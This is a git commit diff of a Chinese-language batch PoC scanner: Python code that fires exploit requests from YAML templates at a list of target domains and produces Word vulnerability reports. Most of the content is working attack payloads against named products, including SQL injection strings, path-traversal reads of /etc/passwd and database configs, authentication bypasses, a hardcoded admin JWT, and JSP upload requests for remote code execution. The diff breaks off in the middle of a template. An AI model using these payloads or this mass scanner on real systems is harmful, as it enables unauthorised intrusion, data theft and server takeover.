commit 1d17587dc63725802cc79cb4ce51d14ccd5114f9 Author: MasonLiu <2857911564@qq.com> Date: Wed Oct 9 15:15:50 2024 +0800 首次上传 diff --git a/ChangeLogs.md b/ChangeLogs.md new file mode 100644 index 0000000..8ea1939 --- /dev/null +++ b/ChangeLogs.md @@ -0,0 +1,37 @@ +### POC扫描器 V1.1 +2024/8/1: +``` +1.更改了扫描逻辑,使其在不存在第二链接检测时直接获取请求包的响应信息,减少资源浪费并提高了识别准确率。 +2.为扫描器添加了默认模式,使用参数 --batch 即可启用 +``` + + + +### 已知问题 +- 截图程序无法调用yaml包中参数,可能导致截图内容错误 + + + + +### 待更新 +- 生成报告的逻辑需要改善,使漏洞报告格式以及内容更加全面 +- 截图逻辑需要更改,使其支持对下载类漏洞的检测截图且截图需截入链接 +- 漏洞扫描框架有待优化,需添加多线程以及更多可以优化性能的模块 +- 漏洞扫描框架需要添加对无回显类漏洞的扫描支持以及截图证明方法 + + + +### 待利用方法 +- python库:pyautogui +```python +mport pyautogui + +# 截取全屏截图 +screenshot = pyautogui.screenshot() + +# 将截图保存为文件 +screenshot.save('screenshot.png') + +print("截图已保存为 screenshot.png") +``` + diff --git a/MatchedPOC.txt b/MatchedPOC.txt new file mode 100644 index 0000000..e69de29 diff --git a/README.md b/README.md new file mode 100644 index 0000000..e69de29 diff --git a/__pycache__/base_tool.cpython-311.pyc b/__pycache__/base_tool.cpython-311.pyc new file mode 100644 index 0000000..91dc624 Binary files /dev/null and b/__pycache__/base_tool.cpython-311.pyc differ diff --git a/__pycache__/base_tool.cpython-312.pyc b/__pycache__/base_tool.cpython-312.pyc new file mode 100644 index 0000000..b532956 Binary files /dev/null and b/__pycache__/base_tool.cpython-312.pyc differ diff --git a/__pycache__/new_poc_tool.cpython-311.pyc b/__pycache__/new_poc_tool.cpython-311.pyc new file mode 100644 index 0000000..b5d53f3 Binary files /dev/null and b/__pycache__/new_poc_tool.cpython-311.pyc differ diff --git a/__pycache__/poc_tool.cpython-311.pyc b/__pycache__/poc_tool.cpython-311.pyc new file mode 100644 index 0000000..45d21b5 Binary files /dev/null and b/__pycache__/poc_tool.cpython-311.pyc differ diff --git a/__pycache__/screenshot.cpython-311.pyc b/__pycache__/screenshot.cpython-311.pyc new file mode 100644 index 0000000..871eb91 Binary files /dev/null and b/__pycache__/screenshot.cpython-311.pyc differ diff --git a/__pycache__/screenshot.cpython-312.pyc b/__pycache__/screenshot.cpython-312.pyc new file mode 100644 index 0000000..f20173c Binary files /dev/null and b/__pycache__/screenshot.cpython-312.pyc differ diff --git a/base_tool.py b/base_tool.py new file mode 100644 index 0000000..1eabc0e --- /dev/null +++ b/base_tool.py @@ -0,0 +1,152 @@ +import requests +import yaml +import os +import warnings +import time +import urllib3 +import logging +from urllib.parse import urlparse, urljoin +from colorama import init, Fore + +init() +os.system("") +warnings.filterwarnings("ignore") +# 禁用不安全请求警告 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +# 配置日志记录 +logging.basicConfig(level=logging.INFO, format=Fore.GREEN + '%(asctime)s' + Fore.RESET + ' - %(message)s', datefmt='%H:%M') + +DEFAULT_HEADERS = { + 'Accept': '*/*', + 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8', + 'Referer': 'https://www.baidu.com', + 'Accept-Encoding': 'gzip, deflate', + 'Connection': 'keep-alive', +} + +def check_url_status(url): + try: + response = requests.get(url, timeout=5, verify=False) + # return response.status_code == 200 + return response.status_code in (200, 301, 302, 307) + except requests.RequestException as e: + # logging.error(f"Error checking URL status: {e}") + return False + +def load_yaml_file(file_path): + try: + with open(file_path, 'r', encoding='utf-8') as stream: + return yaml.safe_load(stream) + except (yaml.YAMLError, FileNotFoundError) as e: + logging.error(f"无法解析 {file_path}: {e}") + return None + +def send_request_and_validate(request_details, response_details, target_url): + method = request_details.get('method', 'GET').lower() + path = request_details.get('path', '/default_path') + path_2 = response_details.get('path', '') + url = urljoin(target_url, path) + if path_2: + url_2 = urljoin(target_url, path_2) + # url_2 = urljoin(target_url, path_2) if path_2 else url + logging.info(f"已发送攻击请求: {url}") + + headers = {key: value for key, value in {**DEFAULT_HEADERS, **request_details.get('headers', {})}.items() if value} + data = request_details.get('body-raw', '') + + logging.info(f"请求方法: {method.upper()}") + logging.info(f"请求头: {headers}") + + try: + # 记录请求开始时间 + start_time = time.time() + + response = requests.request(method, url, headers=headers, data=data, verify=False) + if path_2: + response = requests.request("GET", url_2, headers=DEFAULT_HEADERS, verify=False) + + # 记录请求结束时间并计算响应时间 + response_time = round(time.time() - start_time, 2) + + logging.info(f"响应时间: {response_time} 秒") + + expected_status_code = response_details.get('status-code', 200) + logging.info(f"攻击请求响应码: {expected_status_code} ; 实际响应码: {response.status_code}") + assert response.status_code == expected_status_code, f"验证获得失败响应码: {response.status_code}" + + result_1 = validate_response_body(response.text, response_details.get('body', '')) + result = result_1 + + except AssertionError as e: + logging.error(f"错误: {e}") + result = "不存在漏洞" + except requests.RequestException as e: + logging.error(f"HTTP请求错误: {e}") + result = "请求失败" + except Exception as e: + logging.error(f"请求过程中发送了错误: {e}") + result = "请求失败" + return result, response.status_code, url, response_time + +def validate_response_body(response_body, expected_body): + if expected_body and expected_body not in response_body: + logging.warning("响应体匹配失败。") + return "不存在漏洞" + logging.info("响应体成功匹配!") + # print("\n\n" + response_body + "\n\n") + return "存在漏洞" + +def validate_main(target_url): + results = [] + poc_paths = load_yaml_file_paths('./MatchedPOC.txt') + for poc_path in poc_paths: + # print("--------------------------------------------------") + yaml_content = load_yaml_file(poc_path) + if yaml_content is None: + continue + + name = print_extracted_info(yaml_content) + result, status_code, url, res_time = send_request_and_validate(yaml_content.get('requests', {}), yaml_content.get('response', {}), target_url) + results.append((name, result, status_code, url, res_time)) + # 提取描述部分 + description = yaml_content.get("description", "Description not found") + print("--------------------------------------------------") + + return results, description + +def load_yaml_file_paths(file_path): + try: + with open(file_path, 'r') as file: + return file.read().splitlines() + except FileNotFoundError as e: + logging.error(f"未找到对应 POC 路径文件: {file_path}: {e}") + return [] + +def print_extracted_info(yaml_content): + keyword = yaml_content.get('keyword', '') + name = yaml_content.get('name', '') + description = yaml_content.get('description', '') + impact = yaml_content.get('impact', '') + + logging.info(f"关键词: {keyword}") + logging.info(f"漏洞名称: {name}") + logging.info(f"描述: {description}") + logging.info(f"影响: {impact}") + return name + +def remove_url_suffix(url): + parsed_url = urlparse(url) + return f"{parsed_url.scheme}://{parsed_url.netloc}" + +def poc_scan(target_url): + status = check_url_status(target_url) + if not status: + logging.error(Fore.RED +"目标无法访问,请检查目标地址是否正确!" + Fore.RESET) + return + new_url = remove_url_suffix(target_url) + validate_main(new_url) + +if __name__ == "__main__": + target_url = input("请输入待测目标,如:https://example.com\n") + poc_scan(target_url) diff --git a/file/模板.docx b/file/模板.docx new file mode 100644 index 0000000..698bc2b Binary files /dev/null and b/file/模板.docx differ diff --git a/geckodriver.exe b/geckodriver.exe new file mode 100644 index 0000000..c1e43c8 Binary files /dev/null and b/geckodriver.exe differ diff --git a/new_poc_tools.py b/new_poc_tools.py new file mode 100644 index 0000000..5f2f284 --- /dev/null +++ b/new_poc_tools.py @@ -0,0 +1,220 @@ +import os +import time +import logging +import tldextract +import base64 +import urllib.parse +import sys +import docx +import os +import warnings +import requests +import argparse +from docx.shared import Cm #单位换算函数 +from bs4 import BeautifulSoup +from docx import Document +from docx.oxml.ns import qn +from base_tool import validate_main, check_url_status +from screenshot import screenshot +from colorama import init, Fore + +# 初始化 colorama +init() + +os.system("") +warnings.filterwarnings("ignore") +# 配置日志记录 +# logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s') +logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%H:%M') + +DEFAULT_HEADERS = { + 'Accept': '*/*', + 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8', + 'Referer': 'https://www.baidu.com', + 'Accept-Encoding': 'gzip, deflate', + 'Connection': 'keep-alive', +} + +def get_company_name(url): + # 发送HTTP请求获取网页内容 + response = requests.get(url, headers=DEFAULT_HEADERS, verify=False) + + # 检查请求是否成功 + if response.status_code != 200: + print(f"Failed to retrieve the page. Status code: {response.status_code}") + return None + + # 解析HTML + soup = BeautifulSoup(response.content, 'html.parser') + + # 查找公司名称的标签 + company_name_tag = soup.find('a', id='companyName') + + # 提取公司名称 + if company_name_tag: + return company_name_tag.text + else: + print("公司名称未找到") + return None + +def get_website_title(url): + try: + # 发送HTTP请求获取网页内容 + response = requests.get(url, headers=DEFAULT_HEADERS, verify=False) + response.raise_for_status() # 检查请求是否成功 + except requests.exceptions.RequestException as e: + print(f"Failed to retrieve the page: {e}") + return None + + # 解析HTML + soup = BeautifulSoup(response.content, 'html.parser') + + # 查找标签 + title_tag = soup.find('title') + + # 提取标题内容 + if title_tag: + return title_tag.text + else: + print("网站标题未找到") + return None + +def extract_domains_from_file(file_path): + domains = [] + try: + with open(file_path, 'r') as file: + for line in file: + domains.append(line.strip()) + except FileNotFoundError: + logging.error(f"文件未找到: {file_path}") + except Exception as e: + logging.error(f"读取文件时出错: {e}") + return domains + +def create_document(): + document = Document() + document.styles['Normal'].font.name = 'Times New Roman' + document.styles['Normal']._element.rPr.rFonts.set(qn('w:eastAsia'), u'宋体') + return document + +def extract_root_domain(url): + extracted = tldextract.extract(url) + root_domain = f"{extracted.domain}.{extracted.suffix}" + encoded_bytes = base64.b64encode(root_domain.encode('utf-8')) + encoded_str = encoded_bytes.decode('utf-8') + return urllib.parse.quote(encoded_str) + +def add_scan_results_to_document(document, domain, results, include_all, description, choice_3): + for name, result, status_code, url, res_time in results: + if include_all or result == "存在漏洞": + document.add_heading(f"目标:{domain}", level=3) + document.add_paragraph(f"漏洞名称:{name}") + document.add_paragraph(f"漏洞链接:{url}") + document.add_paragraph(f"响应状态码:{status_code}") + document.add_paragraph(f"响应时间:{res_time}") + document.add_paragraph(f"漏洞情况:{result}") + document.add_paragraph("\n") + if result == "存在漏洞" and choice_3 == "y": + screenshot_path_1 = screenshot(url) + # print(screenshot_path_1) + screenshot_path_2 = screenshot("https://icp.chinaz.com/home/info?host=" + extract_root_domain(domain)) + # print(screenshot_path_2) + #word处理部分 + #导入模板 + doc = docx.Document("./file/模板.docx") + #固定重复部分,以下对应模板中:网站域名,漏洞名称,测试用例 + #word中对应的位置,分别为:网站名称,网站域名,漏洞名称,测试用例 + title = get_website_title(domain) + doc.paragraphs[2].text = title + doc.paragraphs[4].text = domain + doc.paragraphs[6].text = name + doc.paragraphs[8].text = url + doc.paragraphs[10].text = description + #验证截图,添加图片对应word的位置 + paragraph = doc.paragraphs[10] #图片位置 + #添加图片部分,宽高自行调整,单位cm + run = paragraph.add_run() + if screenshot_path_1: + run.add_picture(screenshot_path_1, width=Cm(16.52), height=Cm(9.13)) #添加图片 + run.add_picture(screenshot_path_2, width=Cm(16.52), height=Cm(9.13)) #添加图片 + doc_save_path = './file/result/' + if not os.path.exists(doc_save_path): + os.mkdir(doc_save_path) + #保存word,根据需要自行更改 + company_name = get_company_name("https://icp.chinaz.com/" + domain) + doc_name = str(company_name) + "_" + name + ".docx" + doc.save(doc_save_path + doc_name) + +def mass_poc_scan(domains, include_all, choice_2, docx_name): + document = create_document() + try: + for domain in domains: + logging.info(f"正在扫描域名:{domain}") + if not check_url_status(domain): + logging.warning(f"访问失败,跳过当前域名的扫描:{domain}") + print("--------------------------------------------------") + if choice_2.lower() == 'n': + document.add_heading(f"目标:{domain} 无法访问!", level=3) # 将标题升级为level=3 + continue + + try: + results, description = validate_main(domain) + add_scan_results_to_document(document, domain, results, include_all, description, choice_3) + except Exception as e: + logging.error(f"扫描域名 {domain} 时出错:{e}") + print("--------------------------------------------------") + except KeyboardInterrupt: + print(Fore.RED +'\n检测到Ctrl+C,中断程序。' + Fore.RESET) + save_document(document, docx_name) + +def save_document(document, docx_name): + timestamp = str(int(time.time())) + # 如果 docx_name 为空,则结束程序 + if not docx_name: + logging.info("程序结束!") + sys.exit() + results_dir = "./file/report/" + if not os.path.exists(results_dir): + os.makedirs(results_dir) + document.save(f"{results_dir}/{docx_name}_{timestamp}.docx") + logging.info("扫描报告已生成!") + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="大部分参数在启动程序后输入,若需要启用默认模式,请查看以下说明。") + parser.add_argument('--batch', action='store_true', help='启用批处理模式,默认使用urls目标/删除无洞链接/生成报告') + parser.add_argument('-n', '--name', type=str, help='输入文件名称') + args = parser.parse_args() + + if args.batch: + # 批处理模式 + print("默认模式(默认目标文档/筛选漏洞链接/生成报告)!") + file_path = "./urls.txt" + include_all = False + choice_3 = 'y' + else: + # 交互模式 + choice = input(Fore.BLUE + "请问是否需要输入其他目标文件?(y/n): " + Fore.RESET).lower() + if choice == 'n': + print("默认目标文档:urls.txt") + file_path = "./urls.txt" + else: + file_path = input(Fore.BLUE + "请输入需要扫描的目标文件:" + Fore.RESET) + + print("--------------------------------------------------") + domains = extract_domains_from_file(file_path) + + choice_2 = input(Fore.BLUE + "请问是否删除无漏洞网站记录?(y/n): " + Fore.RESET).lower() + include_all = choice_2 != 'y' + print("--------------------------------------------------") + + choice_3 = input(Fore.BLUE + "请问是否生成漏洞报告?(y/n): " + Fore.RESET).lower() + print("--------------------------------------------------") + # 执行扫描 + domains = extract_domains_from_file(file_path) + if args.batch: + mass_poc_scan(domains, include_all, choice_3, args.name) + else: + docx_name = input(Fore.BLUE + "请输入总报告文件名(回车可跳过生成报告步骤):" + Fore.RESET) + print("--------------------------------------------------") + mass_poc_scan(domains, include_all, choice_3, docx_name) + \ No newline at end of file diff --git a/poc/CVE-Poc/CVE-2023-24832_minio.yaml b/poc/CVE-Poc/CVE-2023-24832_minio.yaml new file mode 100644 index 0000000..7228b51 --- /dev/null +++ b/poc/CVE-Poc/CVE-2023-24832_minio.yaml @@ -0,0 +1,30 @@ +keyword: minio +name: MinIO信息泄露漏洞 +description: | + 在集群部署的Minio中,未授权的攻击者可发送恶意的HTTP请求来获取Minio环境变量中的敏感信息(MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),可能导致攻击者以管理员权限登录Minio。 +requests: # 为空代表默认或者不启用 + path: "/minio/bootstrap/v1/verify" + method: POST + headers: + User-agent: + Content-length: + Accept: + Content-type: + Accept-Encoding: + Cookie: + Referer: + X-Forwarded-For: + body-raw: |- + +response: + path: "" + status-code: 200 + body: "PASSWORD" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | + 泄露系统账号密码 diff --git a/poc/CVE-Poc/CVE-2023-32315_Openfire.yaml b/poc/CVE-Poc/CVE-2023-32315_Openfire.yaml new file mode 100644 index 0000000..c88e22e --- /dev/null +++ b/poc/CVE-Poc/CVE-2023-32315_Openfire.yaml @@ -0,0 +1,29 @@ +keyword: openfire +name: Openfire身份认证绕过 +description: | + Openfire 服务器存在身份认证绕过漏洞,攻击者通过构造特定 URL 链接以 GET 请求发送至漏洞服务器中,即可创建任意账户,进而获取系统权限。 +requests: + path: "/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp" + method: GET + headers: + User-agent: + Content-length: + Accept: + Content-type: + Accept-Encoding: + Cookie: + Referer: + X-Forwarded-For: + body-raw: |- + +response: + status-code: 200 + body: "line" + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | + 攻击者可以通过利用此漏洞在 Openfire 服务器上创建任意账户,并获取系统权限。 diff --git a/poc/CVE-Poc/CVE-2024-21733_Tomcat.yaml b/poc/CVE-Poc/CVE-2024-21733_Tomcat.yaml new file mode 100644 index 0000000..0161210 --- /dev/null +++ b/poc/CVE-Poc/CVE-2024-21733_Tomcat.yaml @@ -0,0 +1,38 @@ +keyword: Tomcat +name: Tomcat信息泄露漏洞 +description: | # 下一行可填写漏洞描述 + Apache Tomcat 信息泄露漏洞(CVE-2024-21733)情报。Apache Tomcat 是一个开源 Java Servlet 容器和 Web 服务器,用于运行 Java 应用程序和动态网页。 +requests: # 为空代表默认或者不启用 + path: "/" + method: POST + headers: + "Sec-Ch-Ua": '"Chromium";v="119", "Not?A_Brand";v="24"' + "Sec-Ch-Ua-Mobile": '?0' + "Sec-Ch-Ua-Platform": "Linux" + "Upgrade-Insecure-Requests": "1" + "Sec-Fetch-Site": "none" + "Sec-Fetch-Mode": "navigate" + "Sec-Fetch-User": '?1' + "Sec-Fetch-Dest": "document" + "Accept-Encoding": "gzip, deflate, br" + "Accept-Language": "en-US,en;q=0.9" + "Priority": "u=0, i" + "Connection": "keep-alive" + "Content-Type": "application/x-www-form-urlencoded" + "Content-Length": "100" + body-raw: |- # 如果需要发送请求体,在下一行开始填写 + X + +response: + path: "" # 不填则默认接收此请求的响应包 + status-code: 200 + body: "Exception Report." # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 + time: # 此处填写响应包响应时间,默认不启用 + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | # 下一行可填写漏洞影响 + Coyote 是 Tomcat 的连接器,处理来自客户端的请求并将它们传递Tomcat 引擎进行处理。攻击者可以通过构造特定请求,在异常页面中输出其他请求的body 数据,修复版本中通过增加 finally 代码块,保证默认会重设缓冲区 position 和 limit 到一致的状态,从而造成信息泄露。 diff --git a/poc/CVE-Poc/CVE编号-框架名称 b/poc/CVE-Poc/CVE编号-框架名称 new file mode 100644 index 0000000..e69de29 diff --git a/poc/Frame-Poc/Fastadmin-lang-ReadFile.yaml b/poc/Frame-Poc/Fastadmin-lang-ReadFile.yaml new file mode 100644 index 0000000..0c2cd16 --- /dev/null +++ b/poc/Frame-Poc/Fastadmin-lang-ReadFile.yaml @@ -0,0 +1,30 @@ +keyword: fastadmin +name: fastadmin任意文件读取漏洞 +description: | + 该漏洞会造成数据库密码泄露 +requests: + path: "/index/ajax/lang?lang=..//..//application/database" + method: GET + headers: + User-agent: + Content-length: + Accept: + Content-type: + Accept-Encoding: + Cookie: + Referer: + X-Forwarded-For: + body-raw: |- + +response: + path: "" + status-code: 200 + body: "database" + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | + 数据库密码泄露过后,攻击者可获取数据库操作权限进行提权然后攻陷服务器。 diff --git a/poc/Frame-Poc/SpringBlade-list-SQL.yaml b/poc/Frame-Poc/SpringBlade-list-SQL.yaml new file mode 100644 index 0000000..a2229a8 --- /dev/null +++ b/poc/Frame-Poc/SpringBlade-list-SQL.yaml @@ -0,0 +1,32 @@ +keyword: SpringBlade +name: SpringBlade_SQL注入漏洞 +description: | + SpringBlade系统menu接口存在SQL注入漏洞 +requests: # 为空代表默认或者不启用 + path: "/api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1" + method: GET + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 + Content-Length: + Accept: + Content-Type: + Accept-Encoding: + Cookie: + Referer: + X-Forwarded-For: + Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ + body-raw: |- + +response: + path: "" # 不填则默认接收此请求的响应包 + status-code: 500 + body: "database" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 + time: # 此处填写响应包响应时间,默认不启用 + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | + SpringBlade 后台框架 /api/blade-system/tenantist路径存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 diff --git a/poc/OA-Poc/EMobile-cdnfile-ReadFile.yaml b/poc/OA-Poc/EMobile-cdnfile-ReadFile.yaml new file mode 100644 index 0000000..f7ce270 --- /dev/null +++ b/poc/OA-Poc/EMobile-cdnfile-ReadFile.yaml @@ -0,0 +1,29 @@ +keyword: E-Mobile +name: 泛微E-Mobile任意文件读取漏洞 +description: | # 下一行可填写漏洞描述 + 泛微E-Mobile client/cdnfile 接口存在任意文件读取漏洞 +requests: # 为空代表默认或者不启用 + path: "/client/cdnfile/C/etc/passwd?linux" + method: GET + headers: + Accept: '*/*' + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8 + Referer: https://www.baidu.com + Accept-Encoding: gzip, deflate + Connection: keep-alive + body-raw: |- # 如果需要发送请求体,在下一行开始填写 + + +response: + path: "" # 不填则默认接收此请求的响应包 + status-code: 200 + body: "root" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 + time: # 此处填写响应包响应时间,默认不启用 + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | # 下一行可填写漏洞影响 + 泛微E-Mobile client/cdnfile 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件、数据库配置文件等等。 diff --git a/poc/OA-Poc/KSOA-PreviewKPQT-SQL.yaml b/poc/OA-Poc/KSOA-PreviewKPQT-SQL.yaml new file mode 100644 index 0000000..467bfd7 --- /dev/null +++ b/poc/OA-Poc/KSOA-PreviewKPQT-SQL.yaml @@ -0,0 +1,32 @@ +keyword: KSOA +name: 用友时空KSOA系统SQL注入漏洞 +description: | + 用友时空KSOA系统接口PreviewKPQT.jsp存在SQL注入漏洞 +requests: # 为空代表默认或者不启用 + path: "/kp/PreviewKPQT.jsp?KPQType=KPQT&KPQTID=1%27+union+select+sys.fn_varbintohexstr(hashbytes(%27md5%27,%27test%27)),2,3+--+" + method: GET + headers: + User-agent: + Content-length: + Accept: + Content-type: + Accept-Encoding: + Cookie: + Referer: + X-Forwarded-For: + body-raw: |- + + +response: + path: "" # 不填则默认接收此请求的响应包 + status-code: 200 + body: "098f6bcd4621d373cade4e832627b4f6" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 + time: # 此处填写响应包响应时间,默认不启用 + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | + 用友时空KSOA接口 /kp/PreviewKPQT.jsp 接口存在SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。 diff --git a/poc/OA-Poc/SRM2.0-autologin-LoginBypass.yaml b/poc/OA-Poc/SRM2.0-autologin-LoginBypass.yaml new file mode 100644 index 0000000..13d1e4d --- /dev/null +++ b/poc/OA-Poc/SRM2.0-autologin-LoginBypass.yaml @@ -0,0 +1,29 @@ +keyword: SRM2.0 +name: 智联云采SRM2.0身份认证绕过漏洞 +description: | # 下一行可填写漏洞描述 + 智联云采SRM2.0系统接口autologin身份认证绕过漏洞 +requests: # 为空代表默认或者不启用 + path: "/adpweb/static/..;/api/sys/app/autologin?loginName=admin" + method: GET + headers: + Accept: '*/*' + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8 + Referer: https://www.baidu.com + Accept-Encoding: gzip, deflate + Connection: keep-alive + body-raw: |- # 如果需要发送请求体,在下一行开始填写 + + +response: + path: "" # 不填则默认接收此请求的响应包 + status-code: 200 + body: "管理工作台" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 + time: # 此处填写响应包响应时间,默认不启用 + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | # 下一行可填写漏洞影响 + 由于智联云采 SRM2.0 autologin 接口代码逻辑存在缺陷,导致未授权的攻击者可以构造特殊绕过身份认证直接以管理员身份接管后台,造成信息泄露,使系统处于极不安全的状态。 diff --git a/poc/OA-Poc/eBridge-addResume-upload.yaml b/poc/OA-Poc/eBridge-addResume-upload.yaml new file mode 100644 index 0000000..35d0a4b --- /dev/null +++ b/poc/OA-Poc/eBridge-addResume-upload.yaml @@ -0,0 +1,35 @@ +keyword: e-Bridge +name: 泛微云桥任意文件上传漏洞 +description: | # 下一行可填写漏洞描述 + 泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞 +requests: # 为空代表默认或者不启用 + path: "/wxclient/app/recruit/resume/addResume?fileElementld=111" + method: POST + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDOVhr5SwLI1wpry7 + body-raw: |- # 如果需要发送请求体,在下一行开始填写 + ------WebKitFormBoundaryDOVhr5SwLI1wpry7 + Content-Disposition: form-data; name="file";filename="1.jsp" + + <%out.println("vuln");%> + ------WebKitFormBoundaryDOVhr5SwLI1wpry7-- + Content-Disposition: form-data; name="file";filename="2.jsp" + + 1 + ------WebKitFormBoundaryDOVhr5SwLI1wpry7-- + +response: + path: "/upload/202408/SV/1.js%70" # 不填则默认接收此请求的响应包 + status-code: 200 + body: "vuln" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 + time: # 此处填写响应包响应时间,默认不启用 + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | # 下一行可填写漏洞影响 + 泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。攻击者可通过任意文件上传漏洞上传文件,获取服务器权限。 diff --git a/poc/OA-Poc/eking-FileUpload-fileupload.yaml b/poc/OA-Poc/eking-FileUpload-fileupload.yaml new file mode 100644 index 0000000..0fea858 --- /dev/null +++ b/poc/OA-Poc/eking-FileUpload-fileupload.yaml @@ -0,0 +1,36 @@ +keyword: eking +name: EKing管理易任意文件上传漏洞 +description: | + eking管理易FileUpload接口存在任意文件上传漏洞 +requests: # 为空代表默认或者不启用 + path: "/app/FileUpload.ihtm?comm_type=EKING&file_name=../../gm.jsp." + method: POST + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 + Content-Length: + Accept: + Content-Type: multipart/form-data; boundary=WebKitFormBoundaryHHaZAYecVOf5sfa6 + Accept-Encoding: + Cookie: + Referer: + X-Forwarded-For: + body-raw: |- + --WebKitFormBoundaryHHaZAYecVOf5sfa6-- + Content-Disposition: form-data; name="uplo_file"; filename="gm.jpg" + + <% out.println("vuln");%> + --WebKitFormBoundaryHHaZAYecVOf5sfa6-- + +response: + path: "/gm.jsp" # 不填则默认接收此请求的响应包 + status-code: 200 + body: "vuln" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 + time: # 此处填写响应包响应时间,默认不启用 + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | + EKing-管理易 FileUpload.ihtm 接口处存在文件上传漏洞,未经身份验证的远程攻击者可利用此漏洞上传任意文件,在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 diff --git a/poc/OA-Poc/eoffice10-schema_mysql-InfoLeak.yaml b/poc/OA-Poc/eoffice10-schema_mysql-InfoLeak.yaml new file mode 100644 index 0000000..9b34625 --- /dev/null +++ b/poc/OA-Poc/eoffice10-schema_mysql-InfoLeak.yaml @@ -0,0 +1,25 @@ +keyword: e-office10 +name: 泛微e-office10敏感信息泄露漏洞 +description: | # 下一行可填写漏洞描述 + 泛微e-office10系统schema_mysql.sql敏感信息泄露漏洞 +requests: # 为空代表默认或者不启用 + path: "/eoffice10/empty_scene/db/schema_mysql.sql" + method: GET + headers: + User-Agent: Mozilla/5.0(Macintosh;IntelMacOSX10_15_7)AppleWebKit/537.36(KHTML,likeGecko)Chrome/120.0.0.0Safari/537.36 + body-raw: |- # 如果需要发送请求体,在下一行开始填写 + + +response: + path: "" # 不填则默认接收此请求的响应包 + status-code: 200 + body: " " # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 + time: # 此处填写响应包响应时间,默认不启用 + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | # 下一行可填写漏洞影响 + 泄露数据库配置文件,可能导致攻击者攻击时逆向获取数据库密码。 diff --git a/poc/OA-Poc/ezEIP-success-RCE.yaml b/poc/OA-Poc/ezEIP-success-RCE.yaml new file mode 100644 index 0000000..60844a8 --- /dev/null +++ b/poc/OA-Poc/ezEIP-success-RCE.yaml @@ -0,0 +1,31 @@ +keyword: 万户 +name: 